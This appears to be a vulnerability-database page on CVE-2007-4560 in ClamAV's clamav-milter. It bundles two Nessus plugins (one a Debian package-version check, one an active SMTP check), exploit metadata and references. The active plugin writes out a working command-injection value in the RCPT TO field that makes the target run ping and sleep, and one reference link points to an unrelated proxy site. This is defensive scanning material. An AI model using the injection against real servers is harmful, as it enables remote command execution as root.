  script_xref(name:"DSA", value:"1366");

  script_name(english:"Debian DSA-1366-1 : clamav - several vulnerabilities");
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Debian host is missing a security-related update."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Several remote vulnerabilities have been discovered in the Clam
anti-virus toolkit. The Common Vulnerabilities and Exposures project
identifies the following problems :

  - CVE-2007-4510
    It was discovered that the RTF and RFC2397 parsers can
    be tricked into dereferencing a NULL pointer, resulting
    in denial of service.

  - CVE-2007-4560
    It was discovered that clamav-milter performs
    insufficient input sanitising, resulting in the
    execution of arbitrary shell commands.

The oldstable distribution (sarge) is only affected by a subset of the
problems. An update will be provided later."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-4510"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security-tracker.debian.org/tracker/CVE-2007-4560"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.debian.org/security/2007/dsa-1366"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade the clamav packages.

For the stable distribution (etch) these problems have been fixed in
version 0.90.1-3etch7."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(78);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:clamav");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:4.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2007/09/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/09/03");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"4.0", prefix:"clamav", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-base", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-daemon", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-dbg", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-docs", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-freshclam", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-milter", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"clamav-testfiles", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"libclamav-dev", reference:"0.90.1-3etch7")) flag++;
if (deb_check(release:"4.0", prefix:"libclamav2", reference:"0.90.1-3etch7")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```
NASL
family | SMTP problems |
id | CLAMAV_MILTER_BLACKHOLE_CMD_EXEC.NASL |
description | The remote host appears to be running a version of Clamav-milter, a filter for sendmail, configured with '--black-hole-mode' that fails to sanitize recipient addresses of shell metacharacters before using them in a call to 'popen()' to determine whether to discard incoming messages. An unauthenticated, remote attacker can leverage this issue to execute arbitrary code, typically as root. |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 29830 |
published | 2008-01-03 |
reporter | This script is Copyright (C) 2008-2018 Tenable Network Security, Inc. |
source | https://www.tenable.com/plugins/nessus/29830 |
title | ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution |
code |

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(29830);
  script_version("1.28");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_cve_id("CVE-2007-4560");
  script_bugtraq_id(25439);

  script_name(english:"ClamAV clamav-milter black-hole-mode Sendmail Recipient Field Arbitrary Command Execution");
  script_summary(english:"Tries to run a command via clamav-milter");

  script_set_attribute(attribute:"synopsis", value:
"The remote mail server allows execution of arbitrary commands." );
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running a version of Clamav-milter, a
filter for sendmail, configured with '--black-hole-mode' that fails to
sanitize recipient addresses of shell metacharacters before using them
in a call to 'popen()' to determine whether to discard incoming
messages. An unauthenticated, remote attacker can leverage this issue
to execute arbitrary code, typically as root." );
  script_set_attribute(attribute:"see_also", value:"https://piratebay-proxies.com/best-internet-security/" );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/477723/100/0/threaded" );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2007/Dec/518" );
  script_set_attribute(attribute:"solution", value:
"Upgrade to ClamAV 0.91.2 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'ClamAV Milter Blackhole-Mode Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
  script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
  script_cwe_id(78);

  script_set_attribute(attribute:"plugin_publication_date", value: "2008/01/03");
  script_set_attribute(attribute:"patch_publication_date", value: "2007/08/24");
  script_set_attribute(attribute:"vuln_publication_date", value: "2007/08/24");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:clamav:clamav");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"SMTP problems");
  script_copyright(english:"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.");

  script_dependencies("smtpserver_detect.nasl", "os_fingerprint.nasl");
  script_require_ports("Services/smtp", 25);
  script_require_keys("Settings/ThoroughTests");

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("smtp_func.inc");

if (! thorough_tests ) exit(0);

# Don't bother checking Windows as ClamAV isn't known to run on it.
os = get_kb_item("Host/OS");
if (os && "Windows" >< os) exit(0);

port = get_service(svc: "smtp", default: 25, exit_on_fail: 1);
if (get_kb_item('SMTP/'+port+'/broken')) exit(0);

# Open a connection.
soc = smtp_open(port:port, helo:this_host_name());
if (!soc) exit(0);

from = "";       # nb: must be a valid sender
rcpt = "nobody"; # nb: must be a valid recipient on remote

# Try to ping the Nessus host with a special pattern.
ping_pat = "cafebabe";
cmd = string("sleep 1; ping -p ", ping_pat, " -c 3 ", this_host_name());
filter = string("icmp and icmp[0] = 8 and src host ", get_host_ip());

c = string('MAIL FROM: <', from, '>');
send(socket:soc, data:string(c, "\r\n"));
s = smtp_recv_line(socket:soc);
if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
{
  c = string('RCPT TO: <', rcpt, '+"|', cmd, '"@localhost>');
  send(socket:soc, data:string(c, "\r\n"));
  s = smtp_recv_line(socket:soc);
  if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
  {
    c = 'DATA';
    send(socket:soc, data:string(c, "\r\n"));
    s = smtp_recv_line(socket:soc);
    if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
    {
      c = '.';
      s = send_capture(socket:soc, data:string(c, "\r\n"), pcap_filter:filter);
      icmp_data = get_icmp_element(icmp:s, element:"data");
      if (tolower(ping_pat) >< tolower(hexstr(icmp_data)))
      {
        smtp_close(socket:soc);
        security_hole(port);
        exit(0);
      }
    }
  }
}

# Try several times to exploit the issue to pause execution for a bit.
#
# nb: this sort of check might be problematic if the nessusd host
#     is heavily loaded.
if ( report_paranoia < 2 ) exit(0);

if (thorough_tests) delays = make_list(1, 6, 11, 16, 21);
else delays = make_list(1, 4, 7);

pauses = make_array();
foreach delay (delays)
{
  cmd = string("sleep ", delay+1);

  c = string('MAIL FROM: <', from, '>');
  send(socket:soc, data: c + '\r\n');
  s = smtp_recv_line(socket:soc);
  if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
  {
    c = string('RCPT TO: <', rcpt, '+"|', cmd, '"@localhost>');
    send(socket:soc, data:string(c, "\r\n"));
    s = smtp_recv_line(socket:soc);
    if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
    {
      c = 'DATA';
      send(socket:soc, data:string(c, "\r\n"));
      s = smtp_recv_line(socket:soc);
      if (strlen(s) && ereg(pattern:"^[2-3][0-9][0-9] .*", string:s))
      {
        # Time how long the remote takes to respond.
        start = unixtime();
        c = '.';
        send(socket:soc, data:string(c, "\r\n"));
        s = smtp_recv_line(socket:soc, retry:5);
        end = unixtime();

        pause = end - start;
        pauses[delay] = pause;

        # nb: we're done if the delay obviously had no effect.
        if (strlen(s) && pause < delay) break;
      }
      else break;
    }
    else break;
  }
  else break;
}
smtp_close(socket:soc);

# Look at the actual time taken for each test.
prev_diff = NULL;
foreach delay (delays)
{
  # Exit if for some reason we didn't complete all the tests.
  if (isnull(pauses[delay])) exit(0);

  # Unless we're being paranoid, exit if the second order difference
  # between tests is not within +-1 second of the expected difference;
  # otherwise we can be reasonably certain the plugin is responsible
  # for the delays rather than a load issue on the remote.
  diff = pauses[delay];
  if (report_paranoia < 2 && !isnull(prev_diff))
  {
    diff2 = diff - prev_diff;
    if (
      (thorough_tests && (diff2 < 4 || diff2 > 6)) ||
      (!thorough_tests && (diff2 < 2 || diff2 > 4))
    ) exit(0);
  }
  prev_diff = diff;
}
security_hole(port);
Packetstorm
data source | https://packetstormsecurity.com/files/download/82333/clamav_milter_blackhole.rb.txt |
id | PACKETSTORM:82333 |
last seen | 2016-12-05 |
published | 2009-10-28 |
reporter | patrick |
source | https://packetstormsecurity.com/files/82333/ClamAV-Milter-Blackhole-Mode-Remote-Code-Execution.html |
title | ClamAV Milter Blackhole-Mode Remote Code Execution |
Saint
bid | 25439 |
description | ClamAV milter popen command injection |
id | misc_av_clamwinup,misc_av_clam |
osvdb | 36909 |
title | clamav_milter_popen |
type | remote |
References
- http://www.nruns.com/security_advisory_clamav_remote_code_exection.php
- http://www.securityfocus.com/bid/25439
- http://www.debian.org/security/2007/dsa-1366
- https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00104.html
- http://security.gentoo.org/glsa/glsa-200709-14.xml
- http://www.mandriva.com/security/advisories?name=MDKSA-2007:172
- http://www.novell.com/linux/security/advisories/2007_18_sr.html
- http://www.trustix.org/errata/2007/0026/
- http://www.securitytracker.com/id?1018610
- http://secunia.com/advisories/26674
- http://secunia.com/advisories/26654
- http://secunia.com/advisories/26683
- http://secunia.com/advisories/26751
- http://secunia.com/advisories/26822
- http://secunia.com/advisories/26916
- http://securityreason.com/securityalert/3063
- http://docs.info.apple.com/article.html?artnum=307562
- http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html
- http://secunia.com/advisories/29420
- http://www.vupen.com/english/advisories/2008/0924/references
- http://www.securityfocus.com/archive/1/477723/100/0/threaded